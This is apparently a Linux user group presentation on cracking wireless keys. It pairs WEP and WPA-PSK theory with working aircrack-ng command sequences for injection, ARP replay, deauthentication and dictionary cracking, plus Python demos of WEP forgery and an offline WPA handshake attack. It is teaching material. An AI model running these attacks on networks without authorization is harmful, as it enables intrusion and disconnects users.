8/12/2019 How to Crack WPA
Ryan Curtin Cracking Wireless - p. 1
Cracking Wireless
Ryan Curtin
LUG@GT
http://www.igglybob.com/
Goals
Setting Up
Checking Injection
WEP
WPA
Questions and Comments?
Goals
By the end of this presentation (if you stay awake), you will:
Understand the different types of wireless keys as well as
their advantages and disadvantages
Understand the legal ramifications of cracking wireless keys
Have a basic idea of the theory behind the cracking of each key type
Know how to use software to crack wireless keys
Setting Up
Most of the work can be done with the aircrack-ng package.
None of these attacks can be performed if you are using
ndiswrapper for your network drivers, or other drivers that do not support monitor mode (often loosely called promiscuous mode; monitor mode is what the tools need, since it delivers raw 802.11 frames from any network, whereas promiscuous mode only lifts the destination-address filter on a network the card is already associated with).
Checking for processes that interfere with monitor mode, then starting / stopping it:
airmon-ng check
airmon-ng start wlan0
airmon-ng stop wlan0
On current aircrack-ng releases, airmon-ng start creates a separate monitor interface (mon0 or wlan0mon, depending on the version); that interface, not wlan0, is the one to pass to the airodump-ng and aireplay-ng commands below, and the one to hand to airmon-ng stop afterwards.
Checking Injection
Before starting, make sure your card can inject packets into an AP!
aireplay-ng -9 -e ESSID -a BSSID wlan0
Here -9 selects aireplay-ng's injection test, ESSID is the target network name and BSSID is the access point MAC; the interface must already be in monitor mode.
Make sure the percentage of ping replies is not incredibly small, otherwise it may be difficult to collect data.
WEP Encryption
The slide title is not redundant! WEP stands for wired equivalent privacy, not wireless encryption protocol.
64-bit or 128-bit keys (24 of those bits are the IV, so the secret part is only 40 or 104 bits)
Uses the RC4 stream cipher with a CRC-32 checksum (the ICV) as its only integrity check
Keys have a 24-bit IV (initialization vector), sent in the clear with every packet and prepended to the secret key to form the RC4 seed
2^24 (about 16.8 million) possible IVs
50% probability of a repeated IV after only about 5000 packets (the birthday bound); two packets with the same IV share one RC4 keystream, so XORing them cancels the keystream, and because CRC-32 is linear a packet can be modified and its checksum fixed up without knowing the key
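The three weaknesses listed above, as an added example in plain Python (this is illustration code written for this page, not the slides' or aircrack-ng's code): a toy RC4/CRC-32 WEP frame, the exact birthday probability for a 24-bit IV, plaintext recovery from two frames that share an IV, and a CRC-32 bit-flipping forgery that still passes the ICV check. The key, IV and packet contents are made up for the demo; the key-index byte that follows the IV on the air is left out.

```python
# Added example, not from the slides: toy WEP (RC4 + CRC-32 ICV) and its flaws.
import math
import zlib

def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA), then `length` keystream bytes (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body: IV in the clear, then RC4(IV || key) over plaintext || ICV,
    where the ICV is CRC-32 of the plaintext, little-endian."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    data = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + xor(data, rc4(iv + wep_key, len(data)))

def wep_decrypt(wep_key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok); icv_ok is False for a wrong key or a damaged frame."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4(iv + wep_key, len(body)))
    plaintext, icv = data[:-4], data[-4:]
    return plaintext, zlib.crc32(plaintext).to_bytes(4, "little") == icv

def iv_collision_probability(packets: int, iv_bits: int = 24) -> float:
    """Exact birthday probability that some IV repeats among `packets` IVs
    drawn uniformly at random from 2**iv_bits values."""
    space = 2 ** iv_bits
    p_distinct = 1.0
    for k in range(packets):
        p_distinct *= 1 - k / space
    return 1 - p_distinct

def packets_for_half_collision(iv_bits: int = 24) -> int:
    """Birthday bound n = sqrt(2 N ln 2): about 4823 packets for N = 2**24."""
    return math.ceil(math.sqrt(2 * 2 ** iv_bits * math.log(2)))

def keystream_reuse_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Frames under the same key and IV share a keystream, so XORing the
    ciphertexts cancels it: C_a ^ C_b == (P_a||ICV_a) ^ (P_b||ICV_b).
    Knowing one plaintext (a predictable ARP or DHCP packet, say) gives the other."""
    assert frame_a[:3] == frame_b[:3], "the leak needs a repeated IV"
    return xor(frame_a[3:], frame_b[3:])

def bitflip_frame(frame: bytes, delta: bytes) -> bytes:
    """Flip chosen plaintext bits of an encrypted frame without the key while
    keeping the ICV valid.  CRC-32 is affine over GF(2):
        crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros of len(p))
    so the ICV correction depends on the chosen delta alone."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    assert len(delta) == n, "delta must cover the whole plaintext"
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))).to_bytes(4, "little")
    return iv + xor(body, delta + icv_delta)

# Constructed sample values for the demo (not real traffic or a real key).
KEY_40BIT = bytes.fromhex("0badc0ffee")   # 40-bit secret + 24-bit IV = "64-bit WEP"
IV = bytes.fromhex("a1b2c3")

def demo() -> dict:
    """Two packets under one IV: recover the second from the first, then
    forge a modified version of it that still passes the ICV check."""
    p_a = b"GET / HTTP/1.0\r\n"          # known plaintext
    p_b = b"user=bob&pin=91"             # victim's plaintext
    c_a = wep_encrypt(KEY_40BIT, IV, p_a)
    c_b = wep_encrypt(KEY_40BIT, IV, p_b)       # same IV: keystream reused
    leak = keystream_reuse_leak(c_a, c_b)[: len(p_b)]
    recovered_b = xor(leak, p_a[: len(p_b)])
    # Change the trailing "91" to "00" in the ciphertext without the key.
    delta = bytes(13) + xor(b"91", b"00")
    forged_plain, icv_ok = wep_decrypt(KEY_40BIT, bitflip_frame(c_b, delta))
    return {
        "packets_for_50pct": packets_for_half_collision(),
        "p_repeat_after_5000": iv_collision_probability(5000),
        "recovered_b": recovered_b,
        "forged_plain": forged_plain,
        "forged_icv_ok": icv_ok,
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Real attacks against WEP do not need a repeated IV at all (FMS, KoreK and PTW recover the key from the IV plus the first keystream bytes of many packets), but the two properties shown here, keystream reuse and a linear ICV, are what make the active attacks on the next slides possible: an injected frame is accepted because its ICV can be fixed up without the key.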
Cracking WEP
Different methods have been developed:
2001: Fluhrer, Mantin, and Shamir publish WEP flaws and a
passive attack (the FMS attack: certain "weak" IVs leak key bytes through RC4's key scheduling)
2005: FBI demonstrates WEP cracking in three minutes
2006: Bittau, Handley, and Lackey show that active attacks are possible (the fragmentation attack, which recovers enough keystream to inject arbitrary frames)
2007: Tews, Weinmann, and Pyshkin optimize the active attack (PTW attack), which recovers a 104-bit key from tens of thousands of captured packets instead of the hundreds of thousands FMS/KoreK needed
Using aircrack-ng
1. Gather important data: access point MAC (BSSID), ESSID, channel
airodump-ng wlan0
2. Start capture of IVs
airodump-ng -c CHANNEL --bssid BSSID -w PREFIX wlan0
Leave this running! You want to capture around 50k IVs
to ensure success (maybe more); the #Data column of airodump-ng is the count of captured data frames, i.e. of IVs, and the capture is written to PREFIX-01.cap.
3. Fake authentication with the AP, so that it accepts the frames you inject in the next step
aireplay-ng -1 0 -e ESSID -a BSSID -h YOURMAC wlan0
-1 0 performs a single fake authentication; -h is the source MAC and must be your own card's MAC, which you will reuse for the ARP replay.
Using aircrack-ng (2)
4. Reinject ARP packets to get more IVs
aireplay-ng -3 -b BSSID -h YOURMAC wlan0
This waits for an ARP request from the network and replays it to the AP over and over; every reply is a new encrypted frame with a fresh IV. Run until you have a substantial number of IVs (in your airodump-ng process).
5. Crack the key!
FMS/KoreK attacks (slow, need far more IVs): aircrack-ng -K -f 1 PREFIX-01.cap
PTW attack (fast!): aircrack-ng -P 2 PREFIX-01.cap
On aircrack-ng 1.0 and later PTW is the default, so plain aircrack-ng PREFIX-01.cap also runs it; the PTW attack only uses ARP-sized packets, which is another reason the ARP replay in step 4 is the preferred way to gather IVs.
WPA Encryption
WPA with TKIP appeared as an interim solution to the WEP problem while 802.11i was prepared; WPA2 is the Wi-Fi Alliance certification of the full 802.11i standard.
WPA: Wi-Fi Protected Access; TKIP: Temporal Key Integrity Protocol
TKIP also uses the RC4 cipher (so that legacy WEP hardware could be upgraded by firmware), but with per-packet key mixing and a keyed message integrity code (Michael) in place of the linear CRC-32
Use AES (CCMP, i.e. WPA2) instead if possible!
IV length increased to 48 bits (the TKIP sequence counter, also used for replay protection), so IV reuse within a session is no longer a practical problem
WPA-PSK (pre-shared key): the common consumer
environment setup; everyone on the network shares one passphrase, and the network is only as strong as that passphrase
Cracking WPA-PSK
The WPA-PSK key derivation is fully reproducible! The pairwise master key is PBKDF2(passphrase, SSID), and the per-session keys are derived from it together with values that travel in the clear in the 4-way handshake (both MAC addresses and both nonces). The handshake messages also carry a MIC computed with one of those derived keys.
Therefore, we must capture a WPA handshake and then try to replicate it: for each candidate passphrase, redo the derivation and check whether it reproduces the captured MIC. This is an offline dictionary attack; it needs no further contact with the network, but it only succeeds if the passphrase is in the wordlist.
Using aircrack-ng
1. Gather important data: access point MAC (BSSID), ESSID, channel; optional: MAC address of a connected client (listed under STATION in airodump-ng; needed for the deauthentication in step 3)
airodump-ng wlan0
2. Start capture of handshakes
airodump-ng -c CHANNEL --bssid BSSID -w PREFIX wlan0
Leave this running! Watch for "WPA handshake: xx:xx:xx:xx:xx:xx" in the top right of the airodump-ng display; the capture goes to PREFIX-01.cap.
3. (Optional) Deauthenticate a connected client to trigger a fresh
handshake when it reconnects
aireplay-ng -0 1 -a BSSID -c CLIENTMAC wlan0
Watch for successful ACKs in the program output. This is an active attack that knocks a real user off the network, so only do it on networks you are authorized to test.
4. Dictionary attack on the saved handshake (aircrack-ng tries each word in the list; a passphrase that is not in the list cannot be recovered this way)
aircrack-ng -w WORDLIST -b BSSID PREFIX-01.cap
Rainbow Tables
Rainbow Tables: a giant collection of precomputed results for common passphrases. For WPA-PSK they are tables of PMKs, i.e. PBKDF2(passphrase, SSID) already computed for a long list of passphrases, so the slow PBKDF2 step (4096 iterations per candidate) is skipped during the attack. Because the SSID is the salt, a table only works for the SSID it was generated for, which is why the published tables cover the most common default SSIDs; a network with a unique SSID is not helped by them.
Available from:
Church of Wifi Rainbow Tables: http://www.renderlab.net/projects/WPA-tables/
The Shmoo Group: http://rainbowtables.shmoo.com/
Google Search: http://www.google.com/#q=wpa+rainbow+tables
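The derivation behind both the "Cracking WPA-PSK" slide and the per-SSID tables above, as an added example in plain Python (written for this page; it is not the slides' code and not how aircrack-ng is implemented, though the arithmetic is the same): PMK from PBKDF2, PTK from the 802.11i PRF, the EAPOL-Key MIC, an offline dictionary attack against a handshake, and a per-SSID PMK table that stands in for a rainbow table. The SSID, MAC addresses, nonces, wordlist and the EAPOL-Key message layout are constructed for the demo (no key data field, so the frame is shorter than a real one); the MIC offset of 81 bytes matches the on-air layout.

```python
# Added example, not from the slides: WPA/WPA2-PSK handshake reproduction.
import hashlib
import hmac

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, which is why precomputed tables are per-SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    Every input except the PMK is visible in the captured handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]   # KCK = PTK[0:16], KEK = PTK[16:32], TK = PTK[32:48]

# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + key IV (16) + key RSC (8) + key ID (8)
MIC_OFFSET = 81

def eapol_mic(kck: bytes, eapol_frame: bytes, wpa2: bool = True) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed.
    Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 128 bits;
    version 1 (WPA/TKIP): HMAC-MD5."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, zeroed, digest).digest()[:16]

def build_eapol_m2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP): on-air field order,
    no key data, so the MIC lands at MIC_OFFSET."""
    body = (
        b"\x02"                          # descriptor type: RSN
        + b"\x01\x0a"                    # key info: MIC set, pairwise, version 2
        + (16).to_bytes(2, "big")        # key length
        + (1).to_bytes(8, "big")         # replay counter
        + snonce                         # 32-byte SNonce
        + bytes(16) + bytes(8) + bytes(8)   # key IV, key RSC, key ID
        + mic
        + (0).to_bytes(2, "big")         # key data length
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type Key

def build_pmk_table(wordlist, ssid: str) -> dict:
    """What a WPA "rainbow table" really is: PBKDF2 done once per SSID."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist}

def crack_psk(wordlist, ssid, ap_mac, client_mac, anonce, snonce, eapol_m2, pmk_table=None):
    """Offline dictionary attack: recompute the MIC for every candidate and
    compare it with the captured one.  With a PMK table for this SSID only
    the cheap PRF + HMAC per candidate remains."""
    captured_mic = eapol_m2[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in wordlist:
        if pmk_table is not None and cand in pmk_table:
            pmk = pmk_table[cand]
        else:
            pmk = pmk_from_passphrase(cand, ssid)
        kck = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_m2), captured_mic):
            return cand
    return None

# Constructed handshake values (not a real capture).
SSID = "linksys"
AP_MAC = bytes.fromhex("001122aabbcc")
CLIENT_MAC = bytes.fromhex("66778899ddee")
ANONCE = hashlib.sha256(b"anonce-demo").digest()
SNONCE = hashlib.sha256(b"snonce-demo").digest()
WORDLIST = ["letmein", "password", "password123", "hunter2"]

def make_capture(passphrase: str) -> bytes:
    """Play the client's side: derive the PTK and emit message 2 with a valid MIC."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_m2(SNONCE, eapol_mic(kck, build_eapol_m2(SNONCE)))

if __name__ == "__main__":
    cap = make_capture("password123")
    print("no table:", crack_psk(WORDLIST, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, cap))
    table = build_pmk_table(WORDLIST, SSID)
    print("with table:", crack_psk(WORDLIST, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, cap, table))
```

Two things worth trying with it: build the table for a different SSID ("NETGEAR", say) and the same wordlist, and the attack finds nothing even though the passphrase is in the list, which is the per-SSID limitation of the published tables; and feed a wordlist without the passphrase, which shows why a long random passphrase or a unique SSID defeats this whole approach. The PBKDF2 helper can be checked against the 802.11i test vector ("password" with SSID "IEEE" gives a PMK starting f42c6fc5).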
Questions and Comments?